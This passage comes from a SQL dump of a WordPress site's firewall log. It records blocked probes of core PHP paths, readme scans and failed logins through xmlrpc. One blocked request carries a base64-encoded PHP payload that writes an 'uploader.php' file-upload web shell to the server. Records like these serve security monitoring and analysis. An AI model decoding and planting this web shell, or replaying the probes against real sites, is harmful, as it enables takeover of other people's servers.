User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3NvZGl1bV9jb21wYXQvc3JjL0NyeXB0by5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134066,1699932660.968968,1699932660.960100,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/sodium_compat/src/Compat.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3NvZGl1bV9jb21wYXQvc3JjL0NvbXBhdC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134067,1699932652.676083,1699932652.667400,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/sodium_compat/namespaced/File.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3NvZGl1bV9jb21wYXQvbmFtZXNwYWNlZC9GaWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134091,1699994998.674952,1699994998.666300,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/Admin/uploads/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L0FkbWluL3VwbG9hZHMv\",\"category\":\"brute-force\",\"ssl\":1}'),(134068,1699932646.579252,1699932646.564400,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/sodium_compat/namespaced/Crypto.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3NvZGl1bV9jb21wYXQvbmFtZXNwYWNlZC9DcnlwdG8ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134069,1699932636.529799,1699932636.519700,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/sodium_compat/namespaced/Compat.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3NvZGl1bV9jb21wYXQvbmFtZXNwYWNlZC9Db21wYXQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134070,1699932628.588866,1699932628.580000,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/sodium_compat/lib/stream-xchacha20.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3NvZGl1bV9jb21wYXQvbGliL3N0cmVhbS14Y2hhY2hhMjAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134071,1699932969.401174,1699932969.387200,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/.well-knownold/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly53ZWxsLWtub3dub2xkLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134089,1699966240.289779,1699966240.267600,0x00000000000000000000FFFF40E34E71,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/css/colors/blue/blue.php?wall=CiAgJGZjID0gJ1BEOXdhSEFnWldOb2J5QW5QSEJ5WlQ0bkxuQm9jRjkxYm1GdFpTZ3BMaUpjYmlJdUp6eGljaTgrUEdadmNtMGdiV1YwYUc5a1BTSndiM04wSWlCbGJtTjBlWEJsUFNKdGRXeDBhWEJoY25RdlptOXliUzFrWVhSaElqNDhhVzV3ZFhRZ2RIbHdaVDBpWm1sc1pTSWdibUZ0WlQwaVgxOGlQanhwYm5CMWRDQnVZVzFsUFNKZklpQjBlWEJsUFNKemRXSnRhWFFpSUhaaGJIVmxQU0pWY0d4dllXUWlQand2Wm05eWJUNG5PMmxtS0NSZlVFOVRWQ2w3YVdZb1FHTnZjSGtvSkY5R1NVeEZVMXNuWDE4blhWc25kRzF3WDI1aGJXVW5YU3dnSkY5R1NVeEZVMXNuWDE4blhWc25ibUZ0WlNkZEtTbDdaV05vYnlBblQwc25PMzFsYkhObGUyVmphRzhnSjBWU0p6dDlmVDgrJzsKICAkZm4gPSAndXBsb2FkZXIucGhwJzsKICBpZiggZnVuY3Rpb25fZXhpc3RzKCdmaWxlX3B1dF9jb250ZW50cycpICkgewogICAgZmlsZV9wdXRfY29udGVudHMoJGZuLCBiYXNlNjRfZGVjb2RlKCRmYykpOwogIH1lbHNlewogICAgQHRvdWNoKCRmbik7CiAgICBpZighJGZvID0gZm9wZW4oJGZuLCAnYScpKSB7CiAgICAgIGVjaG8gJ2Vycm9yJzsKICAgICAgZXhpdDsKICAgIH07CiAgICBmd3JpdGUoJGZvLCBiYXNlNjRfZGVjb2RlKCRmYykpOwogICAgZmNsb3NlKCRmbyk7CiAgfQogIGlmKCBmaWxlX2V4aXN0cygkZm4pICkgewogICAgZWNobyAnYURyaXY0JzsKICAgIGV4aXQ7CiAgfQ%3D%3D','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2Nzcy9jb2xvcnMvYmx1ZS9ibHVlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134072,1699932961.351068,1699932961.341100,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQv\",\"category\":\"brute-force\",\"ssl\":1}'),(134073,1699932956.470724,1699932956.461800,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134088,1699960184.092963,1699960184.065100,0x00000000000000000000FFFF2E142EC6,0,403,0,0,0,'https://eckankar-colorado.org/inputs.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2lucHV0cy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134074,1699932952.687309,1699932952.671900,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-text.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dpZGdldHMvY2xhc3Mtd3Atd2lkZ2V0LXRleHQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134075,1699932944.852901,1699932944.838400,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-tag-cloud.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dpZGdldHMvY2xhc3Mtd3Atd2lkZ2V0LXRhZy1jbG91ZC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134083,0.000000,1699936285.624256,0x00000000000000000000FFFFC20ED93F,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','https://eckankar-colorado.org/wp-login.php','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 OPR/32.0.1948.45','loginFailInvalidUsername',NULL,NULL),(134084,0.000000,1699936697.478972,0x00000000000000000000FFFF225E012B,0,200,0,0,0,'https://eckankar-colorado.org//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134076,1699932941.656155,1699932941.647400,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-search.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dpZGdldHMvY2xhc3Mtd3Atd2lkZ2V0LXNlYXJjaC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134085,0.000000,1699936697.702608,0x00000000000000000000FFFF225E012B,0,200,0,0,0,'https://eckankar-colorado.org//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134086,0.000000,1699936697.932945,0x00000000000000000000FFFF225E012B,0,200,0,0,0,'https://eckankar-colorado.org//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134077,1699932933.848739,1699932933.840000,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-rss.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dpZGdldHMvY2xhc3Mtd3Atd2lkZ2V0LXJzcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134078,1699932924.187470,1699932924.178600,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-recent-posts.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dpZGdldHMvY2xhc3Mtd3Atd2lkZ2V0LXJlY2VudC1wb3N0cy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134087,1699943844.887275,1699943844.864600,0x00000000000000000000FFFF6246325A,0,403,0,0,0,'https://eckankar-colorado.org/style.php?sig=update&domain=51.79.124.111','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134082,1699933211.152126,1699933211.148300,0x00000000000000000000FFFFB9C4DC1A,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/wp-user-avatar/readme.txt',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC11c2VyLWF2YXRhci9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC11c2VyLWF2YXRhci9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134079,1699932918.484207,1699932918.475500,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-recent-comments.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dpZGdldHMvY2xhc3Mtd3Atd2lkZ2V0LXJlY2VudC1jb21tZW50cy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134080,1699932909.694035,1699932909.682200,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-pages.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dpZGdldHMvY2xhc3Mtd3Atd2lkZ2V0LXBhZ2VzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134081,1699933211.152318,1699933211.148300,0x00000000000000000000FFFFB9C4DC1A,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/wp-user-avatar/readme.txt',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC11c2VyLWF2YXRhci9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC11c2VyLWF2YXRhci9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134110,1699994919.086196,1699994919.072000,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/template-canvas.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3RlbXBsYXRlLWNhbnZhcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134111,1699994917.398100,1699994917.388800,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/style-engine.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3N0eWxlLWVuZ2luZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134112,1699994915.856178,1699994915.841800,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/fonts.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 